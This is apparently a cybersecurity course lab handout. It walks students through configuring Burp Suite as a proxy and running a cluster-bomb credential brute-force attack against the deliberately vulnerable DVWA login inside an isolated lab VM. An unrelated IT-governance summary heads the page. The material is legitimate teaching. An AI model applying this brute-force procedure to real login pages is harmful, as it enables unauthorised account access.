Burp Suite Lab - The IT governance and compliance needs of businesses vary widely. For small PDF

Preview

Summary

The IT governance and compliance needs of businesses vary widely. For small businesses, IT governance is often an informal process for the management of services that support the business. For larger companies, IT governance is a framework – a significant set of policies, procedures, and controls – ...

Description

CYB 205 Software Foundations for Cybersecurity Burp Suite Lab The focus of this lab is to gain introductory knowledge and experience with Burp Suite. Burp Suite is a suite of robust web application pentesting tools from the company PortSwigger https://portswigger.net/. Burp Suite is the industry standard for identifying and analyzing vulnerabilities in web applications used by cybersecurity professionals (PentestGeek, 2018). This lab is the successor to the Kali Linux and Metasploitable2 Lab. It is vital for the success of this lab the prior lab must have been completed. Also, both Kali Linux and Metasploitable2 virtual machines (VMs) must be configured properly and operational. The Metasploitable2 VM is plagued with vulnerabilities, it is NOT advisable to allow this VM access to the internet. Refer to the Kali Linux and Metasploitable2 Lab if unsure of the VM’s network configuration. 1. From the Metasploitable2 webpage, select DVWA (Damn Vulnerable Web Application).

2. At the login screen of DVWA input the default username of “admin” all lowercase and the default password of “password” also all lowercase.

1

3. Upon successful login, the DVWA homepage is presented.

4. Next, set the DVWA security level. Select the “DVWA Security” button on the right-hand side of the page. Set the security level to “low” using the dropdown selection and “submit.”

5. The Firefox web browser must be configured to interact with Burp Suite. To do this, the browser must be configured to use a “manual proxy.” To set a “manual proxy,” click the three small horizontal lines (sometimes referred to as “the hamburger”) in the upper right-hand corner of the Firefox browser.

2

6. When the hamburger is selected, a fly-out menu appears. From the fly-out menu, select “Preferences.”

7. Next, select the “Advanced” option on the left-hand side. Then select the “Settings” button.

8. When the “Settings” menu opens, configure the “Manual proxy configuration.” “HTTP Proxy” address must be “127.0.0.1” and “Port” set to “8080.” Ensure the “No Proxy for” box is completely empty; delete any information in this box. Click “Ok” to continue.

Ensure this area is blank.

3

9. Close the “Preferences” tab and return to DVWA.

10. Start “Burp Suite” by selecting the icon from the left-hand side Kali Linux menu. Also, “Burp Suite” can be started by accessing the “Applications” menu from the top left-hand side. Select “Burp Suite” from the favorites menu.

11. When Burp Suite launches, leave the defaults and click “Next.”

4

12. Start Burp Suite with default settings.

13. When the full Burp Suite application opens, select the “Proxy” tab and then the “Intercept” tab. If “Intercept is on” click the button and ensure “Intercept is off.” For this exercise, “Intercept is off” so traffic intercepted by Burp Suite will not have to be manually forwarded. The application is still intercepting traffic due to earlier proxy setup.

14. Check the “Proxy Listeners” in Burp Suite to ensure settings match that of the Firefox browser. Click the “Options” tab and ensure the “Interface” is set to the loopback IP of 127.0.0.1 with port 8080 and “Running” is checked. When the IP address and the port are shown together, it is known as a socket. 127.0.0.1:8080 should be directly under the interface column, if not, then select edit from the left-hand side and make corrections. Keep this window open.

5

15. With Firefox and Burp Suite properly configured, it is time to start a brute force attack on a web application login page. At the DVWA homepage, select the “Brute Force” option on the left. Also, ensure the security level is set to low as shown in the lower left corner.

16. Enter any username and password in the form and click “Login” (use your imagination and pretend you don’t know the credentials). Now go to Burp Suite and check the “HTTP history” tab. Look for a “200” response in the “Status” column with a “username” in the “URL” field. This indicates a successful response from a server (for more info concerning server response codes: https://developer.mozilla.org/en-US/docs/Web/HTTP/Status).

6

17. Look at the information presented. The line with the “200” server response code is highlighted and information pertaining to the host and URL are explained in the “Raw” tab below. The “Get” request shows what credentials were entered in the DVWA web form. The user entered “user” for the username and “qwerty” for the password. The response from the web form shows an incorrect response for these credentials.

7

18. To simplify the brute force attack, create two text files. One text file with a list of possible usernames (screenshot on the left) and another with possible passwords (screenshot on the right). Since this is the free version of Burp Suite, keep the list small and simple as speed is greatly reduced with this version. These text files will serve as payloads for the attack.

19. In the Burp Suite “Raw” tab, right-click within the area. When the pop-up menu appears, select “Send to Intruder.”

Right-click anywhere in the white space.

20. When the information is sent to the “Intruder” the “Intruder” tab will highlight orange. Select the tab.

8

21. Once in the “Intruder” tab, select the “positions” sub-tab and examine the orange highlighted areas. These are the brute force attack areas. The username is “position one” and the password is “position two” and so on. This attack is only concerned with brute forcing positions one and two (username and password).

1

4

2

3

5

22. Change the attack type from “Sniper” to “Cluster bomb” via dropdown option. This will allow use of multiple text files for multiple positions. Highlight the text in the window below the “Attack type” and click the “Clear” button on the right. This will remove the “S” shaped type characters from all brute force positions.

23. Double click the entered username, in this case “user”, and click “Add” button to put the “S” shaped characters around the username. Repeat this process for entered password, in this case “admin.” Putting the “S” shaped characters around the username and password fields ensures Burp Suite will only brute force these two positions.

9

24. Set the payloads in the “Payloads” tab. a. In the “Payload Sets” section, ensure “Payload Set” is “1” which corresponds to the username field to brute force. For the “Payload type” select “Runtime file” from dropdown. In the “Payload Options [Runtime file]” section, navigate to the text file containing the list of possible usernames, highlight the file and click “Open.” b. Repeat this process with “Payload Set” position “2.” Use the dropdown to make this change. This time, the runtime file will be the text document with possible user passwords.

25. Click the “Options” tab and scroll down to the “Grep – Match” section. Clear any text contained in the field by clicking “clear” on the left. Confirm when the dialog box appears. Next, type the word “Incorrect” in the “Add” field and click the “Add” button. This will create a field to show failed brute forced credentials during the attack.

10

26. Scroll up and start the brute force attack by clicking the “Start attack” button and click “OK” when the warning dialog box appears.

27. After the attack has completed (should not take too long) analyze the results. Look at the “Incorrect” column created using the “Grep – match” option created earlier. Highlight a row that does not have an “Incorrect” checkmark in the “Results” area. Below the results area, select the “Response” tab and the “Render” sub-tab. Look for a response that may be the correct username and password credentials.

11

28. Try the credentials indicated by Burp Suite on the DVWA webpage and see if Burp Suite was successful brute forcing the username and password. 29. If the login credentials entered were successful, the “Welcome to the password protected area admin” confirmation should appear as seen below. This completes the Burp Suite lab.

12

References: What Is Burpsuite - Tool Description. (2018). Pentest Geek. Retrieved 20 January 2018, from https://www.pentestgeek.com/what-is-burpsuite

13...